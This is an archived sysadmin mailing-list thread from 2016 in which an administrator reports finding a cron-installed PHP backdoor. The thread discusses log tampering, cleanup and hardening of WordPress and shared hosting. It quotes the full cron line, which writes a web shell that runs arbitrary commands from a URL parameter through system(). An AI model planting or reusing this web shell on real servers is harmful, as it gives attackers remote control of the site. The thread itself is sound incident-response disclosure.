[Systems] Found a backdoor

[Bernie Innocenti]

On 02/25/2016 04:09 AM, Sebastian Silva wrote:
> Remember in June we had an incident with a broken Wordpress site.
> I switched to static generator since then.
> 
> +1 on containers just learning more about them and finding them fascinating.
> Count me in on containerizing everything.
> 
> I'm not aware of other wordpress sites. Maybe walter's blog?
> Wordpress is a PIA IMHO.

Yes, WP is riddled with security holes. Back in October, Samuel helped
Walter upgrade walterbender.org on sunjammer. Samuel, can you confirm
that the WP instance now fully patched and locked down?


> Regards,
> Sebastian
> 
> 
> On 25/02/16 04:47, Bernie Innocenti wrote:
>> While I was looking for cronjobs in /var/spool/cron/crontabs/, i found
>> that www-data was executing commands like these:
>>
>> */27 * * * * echo '<?php if (substr(md5($_GET["localdate"]),0,6) ==
>> "6fbcb8") { $time = str_replace("@"," ",$_GET["localtime"]);
>> @system($time); exit; } ?>' > /srv/www-somosazucar/blog/.cache.php
>>
>> Did you spot the system()? This executes arbitrary commands specified
>> via the "localtime" url parameter. Uh-oh.
>>
>> There were about a dozen lines like the above, installing .cache.php in
>> various virtualhosts. I kept a copy of the file in
>> /root/www-data.backdoor. The file was last written on Jun 23  2015,
>> which may correlate with the switch to the new website.
>>
>> I cleared the mess and searched the logs for requests containing
>> "localtime", but couldn't find any. I wonder if they could filter the
>> logs, since they were previously writable by www-data.
>>
>> Please watch out. We should ensure directories accessible over http are
>> not writable by user www-data, especially those in which PHP and CGIs
>> are enabled.
>>
>> Running several large sites under the same uid has always been a bad
>> security practice, and looking forward we should keep migrating them to
>> properly isolated containers.
>>
>> Finally, Wordpress is particularly dangerous and we should update and
>> harden all instances. Can someone please take care of this? I'll do
>> Mediawiki, which I know pretty well.
>>
> 


-- 
 _ // Bernie Innocenti
 \X/  http://codewiz.org